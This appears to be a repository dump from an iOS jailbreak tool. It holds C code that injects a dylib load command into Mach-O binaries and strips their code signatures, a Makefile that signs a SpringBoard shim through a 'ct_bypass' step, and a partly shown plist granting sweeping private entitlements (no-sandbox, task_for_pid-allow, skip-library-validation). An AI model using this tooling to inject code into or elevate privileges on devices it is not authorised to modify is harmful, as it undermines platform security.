...) { char *question; asprintf(&question, "%s [y/n] ", format); va_list args; va_start(args, format); vprintf(question, args); va_end(args); free(question); while(true) { char *line = NULL; size_t size; if(yes_flag) { puts("y"); line = "y"; } else { getline(&line, &size, stdin); } switch(line[0]) { case 'y': case 'Y': return true; break; case 'n': case 'N': return false; break; default: // NSLogC("[kfdHaxx] insert_dylib: Please enter y or n: "); return true; } } } size_t fpeek(void *restrict ptr, size_t size, size_t nitems, FILE *restrict stream) { off_t pos = ftello(stream); size_t result = fread(ptr, size, nitems, stream); fseeko(stream, pos, SEEK_SET); return result; } void *read_load_command(FILE *f, uint32_t cmdsize) { void *lc = malloc(cmdsize); fpeek(lc, cmdsize, 1, f); return lc; } bool check_load_commands(FILE *f, struct mach_header *mh, size_t header_offset, size_t commands_offset, const char *dylib_path, off_t *slice_size) { fseeko(f, commands_offset, SEEK_SET); uint32_t ncmds = SWAP32(mh->ncmds, mh->magic); off_t linkedit_32_pos = -1; off_t linkedit_64_pos = -1; struct segment_command linkedit_32; struct segment_command_64 linkedit_64; off_t symtab_pos = -1; uint32_t symtab_size = 0; for(int i = 0; i < ncmds; i++) { struct load_command lc; fpeek(&lc, sizeof(lc), 1, f); uint32_t cmdsize = SWAP32(lc.cmdsize, mh->magic); uint32_t cmd = SWAP32(lc.cmd, mh->magic); switch(cmd) { case LC_CODE_SIGNATURE: if(i == ncmds - 1) { if(codesig_flag == 2) { return true; } if(codesig_flag == 0 && !ask("LC_CODE_SIGNATURE load command found. Remove it?")) { return true; } struct linkedit_data_command *cmd = read_load_command(f, cmdsize); fbzero(f, ftello(f), cmdsize); uint32_t dataoff = SWAP32(cmd->dataoff, mh->magic); uint32_t datasize = SWAP32(cmd->datasize, mh->magic); free(cmd); uint64_t linkedit_fileoff = 0; uint64_t linkedit_filesize = 0; if(linkedit_32_pos != -1) { linkedit_fileoff = SWAP32(linkedit_32.fileoff, mh->magic); linkedit_filesize = SWAP32(linkedit_32.filesize, mh->magic); } else if(linkedit_64_pos != -1) { linkedit_fileoff = SWAP64(linkedit_64.fileoff, mh->magic); linkedit_filesize = SWAP64(linkedit_64.filesize, mh->magic); } else { fprintf(stderr, "Warning: __LINKEDIT segment not found.\n"); } if(linkedit_32_pos != -1 || linkedit_64_pos != -1) { if(linkedit_fileoff + linkedit_filesize != *slice_size) { fprintf(stderr, "Warning: __LINKEDIT segment is not at the end of the file, so codesign will not work on the patched binary.\n"); } else { if(dataoff + datasize != *slice_size) { fprintf(stderr, "Warning: Codesignature is not at the end of __LINKEDIT segment, so codesign will not work on the patched binary.\n"); } else { *slice_size -= datasize; //int64_t diff_size = 0; if(symtab_pos == -1) { fprintf(stderr, "Warning: LC_SYMTAB load command not found. codesign might not work on the patched binary.\n"); } else { fseeko(f, symtab_pos, SEEK_SET); struct symtab_command *symtab = read_load_command(f, symtab_size); uint32_t strsize = SWAP32(symtab->strsize, mh->magic); int64_t diff_size = SWAP32(symtab->stroff, mh->magic) + strsize - (int64_t)*slice_size; if(-0x10 <= diff_size && diff_size <= 0) { symtab->strsize = SWAP32((uint32_t)(strsize - diff_size), mh->magic); fwrite(symtab, symtab_size, 1, f); } else { fprintf(stderr, "Warning: String table doesn't appear right before code signature. codesign might not work on the patched binary. (0x%llx)\n", diff_size); } free(symtab); } linkedit_filesize -= datasize; uint64_t linkedit_vmsize = ROUND_UP(linkedit_filesize, 0x1000); if(linkedit_32_pos != -1) { linkedit_32.filesize = SWAP32((uint32_t)linkedit_filesize, mh->magic); linkedit_32.vmsize = SWAP32((uint32_t)linkedit_vmsize, mh->magic); fseeko(f, linkedit_32_pos, SEEK_SET); fwrite(&linkedit_32, sizeof(linkedit_32), 1, f); } else { linkedit_64.filesize = SWAP64(linkedit_filesize, mh->magic); linkedit_64.vmsize = SWAP64(linkedit_vmsize, mh->magic); fseeko(f, linkedit_64_pos, SEEK_SET); fwrite(&linkedit_64, sizeof(linkedit_64), 1, f); } goto fix_header; } } } // If we haven't truncated the file, zero out the code signature fbzero(f, header_offset + dataoff, datasize); fix_header: mh->ncmds = SWAP32(ncmds - 1, mh->magic); mh->sizeofcmds = SWAP32(SWAP32(mh->sizeofcmds, mh->magic) - cmdsize, mh->magic); return true; } else { NSLogC("[kfdHaxx] insert_dylib: LC_CODE_SIGNATURE is not the last load command, so couldn't remove.\n"); } break; case LC_LOAD_DYLIB: case LC_LOAD_WEAK_DYLIB: { struct dylib_command *dylib_command = read_load_command(f, cmdsize); union lc_str offset = dylib_command->dylib.name; char *name = &((char *)dylib_command)[SWAP32(offset.offset, mh->magic)]; int cmp = strcmp(name, dylib_path); free(dylib_command); if(cmp == 0) { if(!ask("Binary already contains a load command for that dylib. Continue anyway?")) { return false; } } break; } case LC_SEGMENT: case LC_SEGMENT_64: if(cmd == LC_SEGMENT) { struct segment_command *cmd = read_load_command(f, cmdsize); if(strcmp(cmd->segname, "__LINKEDIT") == 0) { linkedit_32_pos = ftello(f); linkedit_32 = *cmd; } free(cmd); } else { struct segment_command_64 *cmd = read_load_command(f, cmdsize); if(strcmp(cmd->segname, "__LINKEDIT") == 0) { linkedit_64_pos = ftello(f); linkedit_64 = *cmd; } free(cmd); } case LC_SYMTAB: symtab_pos = ftello(f); symtab_size = cmdsize; } fseeko(f, SWAP32(lc.cmdsize, mh->magic), SEEK_CUR); } return true; } bool insert_dylib(FILE *f, size_t header_offset, const char *dylib_path, off_t *slice_size) { fseeko(f, header_offset, SEEK_SET); struct mach_header mh; fread(&mh, sizeof(struct mach_header), 1, f); if(mh.magic != MH_MAGIC_64 && mh.magic != MH_CIGAM_64 && mh.magic != MH_MAGIC && mh.magic != MH_CIGAM) { NSLogC("[kfdHaxx] insert_dylib: Unknown magic: 0x%x\n", mh.magic); return false; } size_t commands_offset = header_offset + (IS_64_BIT(mh.magic)? sizeof(struct mach_header_64): sizeof(struct mach_header)); bool cont = check_load_commands(f, &mh, header_offset, commands_offset, dylib_path, slice_size); if(!cont) { return true; } // Even though a padding of 4 works for x86_64, codesign doesn't like it size_t path_padding = 8; size_t dylib_path_len = strlen(dylib_path); size_t dylib_path_size = (dylib_path_len & ~(path_padding - 1)) + path_padding; uint32_t cmdsize = (uint32_t)(sizeof(struct dylib_command) + dylib_path_size); struct dylib_command dylib_command = { .cmd = SWAP32(weak_flag? LC_LOAD_WEAK_DYLIB: LC_LOAD_DYLIB, mh.magic), .cmdsize = SWAP32(cmdsize, mh.magic), .dylib = { .name = {SWAP32(sizeof(struct dylib_command), mh.magic)}, .timestamp = 0, .current_version = 0, .compatibility_version = 0 } }; uint32_t sizeofcmds = SWAP32(mh.sizeofcmds, mh.magic); fseeko(f, commands_offset + sizeofcmds, SEEK_SET); char space[cmdsize]; fread(&space, cmdsize, 1, f); bool empty = true; for(int i = 0; i < cmdsize; i++) { if(space[i] != 0) { empty = false; break; } } if(!empty) { if(!ask("It doesn't seem like there is enough empty space. Continue anyway?")) { return false; } } fseeko(f, -((off_t)cmdsize), SEEK_CUR); char *dylib_path_padded = calloc(dylib_path_size, 1); memcpy(dylib_path_padded, dylib_path, dylib_path_len); fwrite(&dylib_command, sizeof(dylib_command), 1, f); fwrite(dylib_path_padded, dylib_path_size, 1, f); free(dylib_path_padded); mh.ncmds = SWAP32(SWAP32(mh.ncmds, mh.magic) + 1, mh.magic); sizeofcmds += cmdsize; mh.sizeofcmds = SWAP32(sizeofcmds, mh.magic); fseeko(f, header_offset, SEEK_SET); fwrite(&mh, sizeof(mh), 1, f); return true; } int insert_dylib_main(const char *dylib_path, const char *binary_path) { struct stat s; if(stat(binary_path, &s) != 0) { perror(binary_path); return -1; } FILE *f = fopen(binary_path, "r+"); if(!f) { NSLogC("[kfdHaxx] insert_dylib: Couldn't open file %s\n", binary_path); return -1; } bool success = true; fseeko(f, 0, SEEK_END); off_t file_size = ftello(f); rewind(f); uint32_t magic; fread(&magic, sizeof(uint32_t), 1, f); switch(magic) { case MH_MAGIC_64: case MH_CIGAM_64: case MH_MAGIC: case MH_CIGAM: if(insert_dylib(f, 0, dylib_path, &file_size)) { ftruncate(fileno(f), file_size); NSLogC("[kfdHaxx] insert_dylib: Added load command to %s\n", binary_path); } else { NSLogC("[kfdHaxx] insert_dylib: Failed to add load command!\n"); success = false; } break; default: NSLogC("[kfdHaxx] insert_dylib: Unknown magic: 0x%x\n", magic); return -1; } fclose(f); if(!success) { return -1; } return 0; } ================================================ FILE: RootHelperSample/launchdshim/.gitignore ================================================ launchd launchdinjected launchdsignedinjected launchdhook/launchdhooksigned.dylib SpringBoardShim/launchdsignedinjected SpringBoardShim/springboardshiminjected SpringBoardShim/springboardshimsignedinjected ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/Makefile ================================================ TARGET := iphone:clang:latest ARCHS = arm64e include $(THEOS)/makefiles/common.mk TOOL_NAME = springboardshim springboardshim_FILES = main.c springboardshim_CFLAGS = -fobjc-arc -isystem springboardshim_LDFLAGS = -L./ -lbsm springboardshim_CODESIGN_FLAGS = -SSpringBoardEnts.plist #springboardshim_PRIVATE_FRAMEWORKS = SpringBoard SpringBoardServices Foundation // adding SpringBoard to privateframeworks here will add it into load command before the tweak dylib is loaded, which causes the platform check to fail - thanks DuyKhanhTran after-package:: ct_bypass -i .theos/obj/debug/springboardshim -o springboardshimsigned include $(THEOS_MAKE_PATH)/tool.mk ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardEnts.plist ================================================ allow-obliterate-device application-identifier com.apple.springboard com.apple.private.security.no-sandbox com.apple.private.domain-extension com.apple.private.security.container-required com.apple.private.security.no-container com.apple.private.skip-library-validation com.apple.private.xpc.domain-extension com.apple.private.xpc.domain-extension.proxy com.apple.private.xpc.launchd.app-state-manager com.apple.private.xpc.launchd.enable-disable-system-services com.apple.private.xpc.launchd.event-monitor com.apple.private.xpc.launchd.loginitem-bootstrapper com.apple.private.xpc.launchd.loginitem-outside-bundle com.apple.private.xpc.launchd.obliterator com.apple.private.xpc.launchd.per-user-create.mbsetupuser com.apple.private.xpc.launchd.per-user-lookup com.apple.private.xpc.launchd.reboot com.apple.private.xpc.launchd.service-hold com.apple.private.xpc.launchd.userspace-reboot com.apple.private.xpc.launchd.userspace-reboot-now com.apple.private.xpc.persona-creator com.apple.private.xpc.persona-manager com.apple.private.persona-mgmt com.apple.private.xpc.service-attach com.apple.private.xpc.service-configure platform-application get-task-allow task_for_pid-allow com.apple.security.network.server aps-connection-initiate backupd-connection-initiate checklessPersistentURLTranslation com.apple.BTServer.allowRestrictedServices com.apple.BTServer.programmaticPairing com.apple.CallHistory.sync.allow com.apple.CommCenter.StormBreaker com.apple.CommCenter.fine-grained spi preferences-reset voice identity phone carrier-settings com.apple.CompanionLink com.apple.Contacts.database-allow com.apple.CoreRoutine.LocationOfInterest com.apple.MobileInternetSharing.allow com.apple.ModeEntityScorer com.apple.Pasteboard.trusted-authentication-message-request com.apple.PerformanceTrace.Tracing com.apple.QuartzCore.cache-asynchronous com.apple.QuartzCore.debug com.apple.QuartzCore.displayable-context com.apple.QuartzCore.flipbook com.apple.QuartzCore.global-capture com.apple.QuartzCore.occlusion-override com.apple.QuartzCore.secure-capture com.apple.QuartzCore.secure-mode com.apple.QuartzCore.system-layers com.apple.SystemConfiguration.SCDynamicStore-write-access com.apple.SystemConfiguration.SCPreferences-write-access com.apple.AutoWake.xml preferences.plist com.apple.radios.plist com.apple.TapToRadarKit.service-access com.apple.abm.helper.mobile.allow com.apple.accounts.appleaccount.fullaccess com.apple.assistant.announcement_state com.apple.assistant.client com.apple.assistant.settings com.apple.authkit.client.private com.apple.authkit.writer.internal com.apple.avfoundation.allow-identifying-output-device-details com.apple.avfoundation.allow-still-image-capture-shutter-sound-manipulation com.apple.avfoundation.allow-system-wide-context com.apple.avfoundation.allows-access-to-device-list com.apple.avfoundation.allows-set-output-device com.apple.backboard.client com.apple.backboard.display.archive com.apple.backboard.displaybrightness com.apple.backboardd.cancelsTouchesInHostedContent com.apple.backboardd.displayArrangement com.apple.backboardd.eventAuthenticationVerification com.apple.backboardd.global-pointer-event-routing com.apple.backboardd.hostCanRequireTouchesFromHostedContent com.apple.backboardd.lastUserEventTime com.apple.backboardd.launchapplications com.apple.backboardd.pointerAutomation com.apple.backboardd.pointerRepositioning com.apple.backboardd.touchDeliveryObservation com.apple.backboardd.transferTouches com.apple.backboardd.virtualDisplay com.apple.bannerkit.post com.apple.biome.PublicStreamAccessService com.apple.bluetooth.system com.apple.bulletinboard com.apple.bulletinboard.dataprovider com.apple.bulletinboard.observer com.apple.bulletinboard.serverconduit com.apple.bulletinboard.settings com.apple.bulletinboard.systemstate com.apple.bulletinboard.utilities com.apple.cards.all-access com.apple.chronod.toolservices com.apple.chronoservices com.apple.coreaudio.CanRecordPastData com.apple.coreaudio.allow-amr-decode com.apple.coreaudio.allow-opus-codec com.apple.coreaudio.allow-speex-codec com.apple.coreduetd.allow com.apple.coreduetd.batterysaver.allow com.apple.coreduetd.context com.apple.coreduetd.knowledge com.apple.coremedia.allow-pre-wiring-pixel-buffers com.apple.coremedia.allow-protected-content-playback com.apple.coremedia.virtualdisplaysession com.apple.developer.extension-host.widget-extension com.apple.developer.homekit com.apple.developer.ubiquity-kvstore-identifier com.apple.springboard com.apple.duet.activityscheduler.allow com.apple.duet.expertcenter.consumer com.apple.extensionkit.host.extension-point-identifiers com.apple.SoundScapesViewServices.ViewService com.apple.fileprovider.acl-write com.apple.fileprovider.enumerate com.apple.fileprovider.fetch-url com.apple.frontboard.app-badge-value-access com.apple.frontboard.launchapplications com.apple.frontboard.shutdown com.apple.frontboardservices.display-layout-monitor com.apple.geoservices.navigation_info com.apple.homekit.private-spi-access com.apple.iapd.accessibility com.apple.icloud.findmydeviced.access com.apple.icloud.findmydeviced.findmydevice-user-agent.access com.apple.icloud.fmfd.access com.apple.icloud.searchpartyd.beaconmanager com.apple.idle-timer-services com.apple.imagent com.apple.imagent.av com.apple.imagent.chat com.apple.intents.extension.discovery com.apple.intents.uiextension.discovery com.apple.internal.seserviced.all.endpoints.and.cas com.apple.internal.seserviced.ptattestation com.apple.itunesstored.private com.apple.keystore.device com.apple.keystore.lockassertion com.apple.keystore.stash.access com.apple.launchservices.clearadvertisingid com.apple.localizationswitcher com.apple.locationd.activity com.apple.locationd.asmanager com.apple.locationd.authorizeapplications com.apple.locationd.effective_bundle com.apple.locationd.motion_alarms com.apple.locationd.place_inference com.apple.locationd.prompt_behavior com.apple.locationd.region_proxy_service com.apple.locationd.status com.apple.locationd.usage_oracle com.apple.locationd.vehicle_data com.apple.logind.client.entitlement com.apple.lsapplicationproxy.deviceidentifierforvendor com.apple.managedconfiguration.mdmd-access com.apple.managedconfiguration.profiled-access com.apple.mediaremote.ui-control com.apple.mediastream.mstreamd-access com.apple.messages.composeclient com.apple.mkb.usersession.info com.apple.mkb.usersession.loginwindow com.apple.mobile.deleted.AllowFreeSpace com.apple.mobile.keybagd.UserManager.logoutcritical com.apple.mobilemail.mailservices com.apple.multitasking.systemappassertions com.apple.multitasking.termination com.apple.nano.nanoregistry.generalaccess com.apple.nfcd.hwmanager com.apple.nfcd.radio.powertoggle com.apple.nfcd.seshat com.apple.nfcd.session.ecommerce com.apple.nfcd.session.fieldOperations com.apple.nfcd.session.peerpayment com.apple.nfcd.session.reader.internal com.apple.nfcd.session.se com.apple.nfcd.session.trust com.apple.nfcd.singleUser com.apple.notificationcenter.widgetcontrollerhascontent com.apple.osanalytics.otatasking-service-access com.apple.payment.configuration com.apple.payment.presentation com.apple.photos.bourgeoisie com.apple.pointerui.persistentlyHidePointer com.apple.pointerui.service-keep-alive-assertion com.apple.pointerui.set-system-cursor-interaction-context com.apple.posterboardservices.data-store com.apple.posterboardservices.data-store.accessSwitcherConfiguration com.apple.powerd.lowpowermode.allow com.apple.private.CallHistory.read com.apple.private.ClipServices com.apple.private.CoreAuthentication.SPI com.apple.private.InstallCoordination.allowed com.apple.private.MobileContainerManager.otherIdLookup com.apple.private.MobileGestalt.AllowedProtectedKeys InverseDeviceID com.apple.private.ReplayKitAngel.client com.apple.private.SafariServices.PasswordPicker.setRemoteAppProperties com.apple.private.ShazamKit com.apple.private.WebClips.read-write com.apple.private.accessories.showallconnections com.apple.private.accounts.allaccounts com.apple.private.activitykit.activityAuthorizer com.apple.private.activitykit.activityEnder com.apple.private.activitykit.alertPresenter com.apple.private.activitykit.assertionRequester com.apple.private.activitykit.listener com.apple.private.activitykit.presentationAssertionRequester com.apple.private.activitykit.prominenceObserver com.apple.private.airdrop.settings com.apple.private.appleaccount.app-hidden-from-icloud-settings com.apple.private.applecredentialmanager.allow com.apple.private.appstored Repair TestFlightFeedback StoreKitExternalNotification Update com.apple.private.assets.accessible-asset-types com.apple.MobileAsset.DuetExpertCenterAsset com.apple.private.attentionawareness com.apple.private.attentionawareness.poll com.apple.private.attribution.implicitly-assumed-identity type path value /System/Library/CoreServices/SpringBoard.app/SpringBoard com.apple.private.barcodesupport.allowNotifications com.apple.private.biome.read-only AppLaunch InferredMode Notification ScreenSharing HomeKitClientAccessoryControl HomeKitClientMediaAccessoryControl HomeKitClientActionSet com.apple.private.biome.read-write SiriUI Device.Display.Appearance Device.Display.AlwaysOn OSAnalytics.Hardware.Reliability com.apple.private.biome.realTimeSensorSession com.apple.private.bmk.allow com.apple.private.calendar.allow-suggestions com.apple.private.canGetAppLinkInfo com.apple.private.canModifyAppLinkPermissions com.apple.private.carkit com.apple.private.carkit.app com.apple.private.carkit.dnd com.apple.private.clouddocs.can-grant-access-to-document com.apple.private.contactsui com.apple.private.coordination.alarms com.apple.private.coordination.timers com.apple.private.coreaudio.borrowaudiosession.allow com.apple.private.coreaudio.mxsessionPropertyPipe com.apple.private.coremedia.interruptions.phonecallpriority.allow com.apple.private.corerecents com.apple.private.coreservices.canmaplsdatabase com.apple.private.coreservices.canopenactivity com.apple.private.coreservices.lsuseractivityd.bestappsuggestion com.apple.private.corespotlight.internal com.apple.private.corespotlight.search.internal com.apple.private.corewifi.internal com.apple.private.dmd.policy com.apple.private.donotdisturb.behavior.resolution.client-identifiers com.apple.springboard.SBBulletinSpokenObserverGateway com.apple.springboard.NCBulletinNotificationSource com.apple.private.donotdisturb.mode.assertion.client-identifiers com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.hid com.apple.focus.activity-manager com.apple.private.donotdisturb.mode.assertion.user-requested.client-identifiers com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.hid com.apple.focus.activity-manager com.apple.private.donotdisturb.modeconfiguration.modify.client-identifiers com.apple.focus.activity-manager com.apple.focussettingsui.activity-config com.apple.springboard.donotdisturb.notifications com.apple.springboard.NCModeManager com.apple.private.donotdisturb.modeconfiguration.request.client-identifiers com.apple.focus.activity-manager com.apple.focussettingsui.activity-config com.apple.springboard.donotdisturb.notifications com.apple.springboard.NCModeManager com.apple.proactive.AppPredictionClient com.apple.springboard.focusappconfigurationcontextmonitor com.apple.private.donotdisturb.modeconfiguration.updates.client-identifiers com.apple.focus.activity-manager com.apple.focussettingsui.activity-config com.apple.springboard.donotdisturb.notifications com.apple.proactive.AppPredictionClient com.apple.springboard.SBIconController com.apple.springboard.NCModeManager com.apple.springboard.focusappconfigurationcontextmonitor com.apple.FocusSettings com.apple.private.donotdisturb.settings.request.client-identifiers com.apple.springboard.donotdisturb.notifications com.apple.donotdisturb.control-center.module com.apple.focus.activity-manager com.apple.springboard.SBIconController com.apple.proactive.AppPredictionClient com.apple.private.donotdisturb.settings.updates.client-identifiers com.apple.springboard.donotdisturb.notifications com.apple.private.donotdisturb.state.request.client-identifiers com.apple.springboard.SBIconController com.apple.springboard.SBDashBoardCombinedListViewController com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.awdmetrics com.apple.springboard.dashboard.bedtime com.apple.accessibility.visual.alerts com.apple.springboard.donotdisturb.hid com.apple.springboard.SBDoNotDisturbMetric com.apple.focus.activity-manager com.apple.springboard.NCModeManager com.apple.springboard.dndstatemonitor com.apple.springboard.CoverSheetDiscoveryProvider com.apple.private.donotdisturb.state.updates.client-identifiers com.apple.springboard.SBIconController com.apple.springboard.SBDashBoardCombinedListViewController com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.awdmetrics com.apple.springboard.dashboard.bedtime com.apple.accessibility.visual.alerts com.apple.springboard.donotdisturb.hid com.apple.springboard.SBDoNotDisturbMetric com.apple.focus.activity-manager com.apple.springboard.NCModeManager com.apple.springboard.dndstatemonitor com.apple.springboard.CoverSheetDiscoveryProvider com.apple.private.externalaccessory.showallaccessories com.apple.private.followup com.apple.private.game-center Account Games com.apple.private.game-center.bypass-authentication com.apple.private.healthkit com.apple.private.healthkit.feature-availability.read SleepCoaching com.apple.private.healthkit.read_authorization_override HKCategoryTypeIdentifierSleepAnalysis com.apple.private.healthkit.source_override com.apple.mobiletimer com.apple.private.healthkit.write_authorization_override HKCategoryTypeIdentifierSleepAnalysis com.apple.private.hid.client.event-dispatch com.apple.private.hid.client.service-protected com.apple.private.hid.manager.client com.apple.private.homekit com.apple.private.homekit.allow-secure-access com.apple.private.icfcallserver com.apple.private.ids.idsquery com.apple.private.ids.messaging com.apple.private.alloy.bulletinboard com.apple.private.alloy.donotdisturb com.apple.madrid com.apple.private.alloy.siri.phrasespotter com.apple.private.ids.messaging.urgent-priority com.apple.private.alloy.bulletinboard com.apple.private.alloy.donotdisturb com.apple.private.alloy.siri.phrasespotter com.apple.private.ids.registration-reset com.apple.private.imavcore.imavagent com.apple.private.imcore.imdpersistence.database-access com.apple.private.imcore.imremoteurlconnection com.apple.private.imcore.spi.database-access com.apple.private.in-app-payments com.apple.private.iokit.powersource-control com.apple.private.kernel.darkboot com.apple.private.kernel.jetsam com.apple.private.librarian.can-get-application-info com.apple.private.lockdown.finegrained-get NULL/ActivationState NULL/BrickState NULL/SBLockdownEverRegisteredKey com.apple.xcode.developerdomain/DeveloperStatus NULL/BuildExpireTime com.apple.private.lockdown.finegrained-remove com.apple.mobile.iTunes.store/AppleID com.apple.mobile.data_sync/Contacts com.apple.mobile.data_sync/Calendars com.apple.mobile.data_sync/Bookmarks com.apple.mobile.data_sync/Mail Accounts com.apple.private.mediaexperience.allowemergencyalertpriority com.apple.private.mediasafetynet.exception.notificationappex com.apple.private.mis.online_auth_agent com.apple.private.mobileinstall.allowedSPI UninstallForLaunchServices SetCapabilities Lookup com.apple.private.mobilesafari.searchengine com.apple.private.mobilestoredemo.enabledemo Manage com.apple.private.mobiletimerd com.apple.private.nearbyinteraction.system-shutdown com.apple.private.network.socket-delegate com.apple.private.networkextension.configuration com.apple.private.persona.read com.apple.private.photos.service.demo com.apple.private.photos.service.multilibrary com.apple.private.ppm.superclient com.apple.private.replay-kit com.apple.private.rtcreportingd com.apple.private.screen-time com.apple.private.security.container-manager com.apple.private.security.storage.AppDataContainers com.apple.private.security.storage.Calendar com.apple.private.security.storage.Photos com.apple.private.security.storage.clipserviced com.apple.private.security.storage.familycircled com.apple.private.security.storage.triald com.apple.private.sessionkit.alertPresenter com.apple.private.sessionkit.assertionRequester com.apple.private.sessionkit.custom-platter-target com.apple.private.sessionkit.listener com.apple.private.sessionkit.permitMultipleProcessInputs com.apple.private.sessionkit.presentationAssertionRequester com.apple.private.sessionkit.prominenceObserver com.apple.private.sessionkit.sessionFinisher com.apple.private.sessionkit.sessionRequest com.apple.private.sharing.unlock-manager com.apple.private.shazamkit.allow-external-audio-recording com.apple.private.shazamkit.allow-internal-audio-recording com.apple.private.sleepd com.apple.private.suggestions.contacts com.apple.private.suggestions.events com.apple.private.system-keychain com.apple.private.tcc.allow kTCCServiceAddressBook kTCCServiceCalendar kTCCServiceReminders kTCCServicePhotos kTCCServicePhotosAdd kTCCServiceMediaLibrary kTCCServiceMicrophone kTCCServiceCamera kTCCServiceWillow kTCCServiceFaceID kTCCServiceBluetoothAlways com.apple.private.tcc.manager.access.read kTCCServiceFocusStatus com.apple.private.tipsd.discoverability com.apple.private.tty.settings com.apple.private.ubiquity-kvstore-access com.apple.weather com.apple.stocks com.apple.backboardd com.apple.Accessibility com.apple.Accessibility.SwitchControl com.apple.Accessibility.TouchAccommodations com.apple.AssistiveTouch com.apple.HearingAids com.apple.SpeakSelection com.apple.VoiceOverTouch com.apple.ZoomTouch com.apple.private.usernotifications.bundle-identifiers com.apple.donotdisturb com.apple.mobiletimer com.apple.usernotifications.example com.apple.private.usernotifications.settings read com.apple.private.vfs.allow-low-space-writes com.apple.private.vfs.open-by-id com.apple.private.wallpaperkit.service.migration com.apple.private.xpc.launchd.app-server com.apple.proactive.ActionPrediction.predictions com.apple.proactive.AppPrediction.predictions com.apple.proactive.DefaultWidgetSuggester com.apple.proactive.NotificationDigest.xpc com.apple.proactive.ProactiveSuggestionClientModel.xpc com.apple.proactive.SuggestedPages com.apple.proactive.UserEducationSuggestion.server-listener.xpc com.apple.proactive.appDirectory com.apple.proactive.eventtracker com.apple.proactive.hero.AppPrediction.predictions com.apple.proactive.infoSuggestion.xpc com.apple.purplebuddy.budd.access com.apple.remotenotification.access com.apple.remotenotification.preferences com.apple.rootless.storage.com.apple.MobileAsset.DuetExpertCenterAsset com.apple.rootless.storage.coreduet_knowledge_store com.apple.rootless.storage.proactivepredictions com.apple.runningboard.hereditarygrantoriginator com.apple.runningboard.posterkit.host com.apple.runningboard.primitiveattribute com.apple.runningboard.process-state com.apple.runningboard.request.identity com.apple.runningboard.terminateprocess com.apple.runningboard.underlyingassertion com.apple.securebackupd.access com.apple.security.application-groups group.com.apple.weather group.com.apple.stocks com.apple.Home.group com.apple.security.enterprise-volume-access com.apple.security.exception.files.absolute-path.read-only /private/var/mobile/Library/Trial/NamespaceDescriptors/ /private/var/mobile/Library/Trial/Treatments/180/ com.apple.security.exception.mach-lookup.global-name com.apple.sirittsd com.apple.proactive.UserEducationSuggestion.server-listener.xpc com.apple.Photos.MultiLibrary com.apple.abm.helper.mobile com.apple.siri.activation.service com.apple.springboard.SBRendererService com.apple.appstored.xpc com.apple.appstored.xpc.request com.apple.PointerUI.pointeruid.service-launching com.apple.proactive.appDirectory com.apple.CarPlayApp.service com.apple.sleepd.sleepserver com.apple.donotdisturb.service com.apple.coordination.alarms com.apple.coordination.timers com.apple.tipsd com.apple.ModeEntityScorer com.apple.proactive.NotificationDigest.xpc com.apple.assistant.announcement_state.service com.apple.icloud.searchpartyd.beaconmanager com.apple.server.bluetooth.general.xpc com.apple.powerd.smartpowernap com.apple.biomesyncd.realTimeSession com.apple.sessionservices aps-connection-initiate com.apple.mobileassetd.v2 com.apple.HearingApp com.apple.security.exception.shared-preference.read-only com.apple.appstored com.apple.itunesstored com.apple.suggestions com.apple.security.iokit-user-client-class AGXCommandQueue AGXDevice AGXDeviceUserClient AGXSharedUserClient AppleCredentialManagerUserClient AppleJPEGDriverUserClient ApplePPMUserClient AppleSPUHIDDeviceUserClient AppleSPUHIDDriverUserClient IOAccelContext IOAccelContext2 IOAccelDevice IOAccelDevice2 IOAccelSharedUserClient IOAccelSharedUserClient2 IOAccelSubmitter2 IOHIDEventServiceFastPathUserClient IOHIDLibUserClient IOMobileFramebufferUserClient IOReportUserClient IOSurfaceAcceleratorClient IOSurfaceRootUserClient RootDomainUserClient IOGPUDeviceUserClient com.apple.security.system-container com.apple.security.system-groups systemgroup.com.apple.sharedpclogging systemgroup.com.apple.regulatory_images systemgroup.com.apple.userimagecache com.apple.seld.tsmamnager com.apple.seserviced.key com.apple.seserviced.kmlXpcService com.apple.sharing.Client com.apple.sharing.CoordinatedAlerts com.apple.sharing.Diagnostics com.apple.sharing.Session com.apple.siri.VoiceShortcuts.xpc com.apple.siri.activation.assertion com.apple.siri.activation.button-event.listener com.apple.siri.activation.service com.apple.siri.client_lite com.apple.siri.external_request com.apple.sos.trigger com.apple.soundscapes.picker com.apple.splashboard.launch-image-capture com.apple.springboard-ui.client com.apple.springboard.activateRemoteAlert com.apple.springboard.activateawayviewplugins com.apple.springboard.allowallcallurls com.apple.springboard.application-removability.proxy com.apple.springboard.display-lookup com.apple.springboard.lockScreenContentAssertion com.apple.springboard.multiwindow.triggerShowAllWindows com.apple.springboard.opensensitiveurl com.apple.springboard.openurlswhenlocked com.apple.springboard.setbadgestring com.apple.springboard.shortcutitems.fullaccess com.apple.springboard.statusbarstyleoverrides com.apple.springboard.statusbarstyleoverrides.coordinator UIStatusBarStyleOverrideAutoAirPlayReady UIStatusBarStyleOverrideAutoAirPlayPlaying com.apple.symptom_analytics.query com.apple.symptom_analytics.refresh com.apple.symptoms.NetworkOfInterest com.apple.telephonyutilities.callservicesd access-calls modify-calls access-call-providers access-moments com.apple.timed com.apple.trial.client 962 com.apple.tzlink.allow com.apple.ui-services-discovery com.apple.videoconference.allow-conferencing com.apple.visualvoicemail.client com.apple.voiceservices.tts.customvoice com.apple.voicetrigger.voicetriggerservice com.apple.wallet.banner com.apple.watchlist.private com.apple.wifi.manager-access com.apple.wipedevice fairplay-client 1172857363 keychain-access-groups apple com.apple.preferences vm-pressure-level ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardEntsBedtime.plist ================================================ platform-application com.apple.private.security.container-required allow-obliterate-device application-identifier com.apple.springboard aps-connection-initiate backupd-connection-initiate checklessPersistentURLTranslation com.apple.BTServer.allowRestrictedServices com.apple.BTServer.programmaticPairing com.apple.CallHistory.sync.allow com.apple.CommCenter.StormBreaker com.apple.CommCenter.fine-grained spi preferences-reset voice identity phone carrier-settings com.apple.CompanionLink com.apple.Contacts.database-allow com.apple.CoreRoutine.LocationOfInterest com.apple.MobileInternetSharing.allow com.apple.ModeEntityScorer 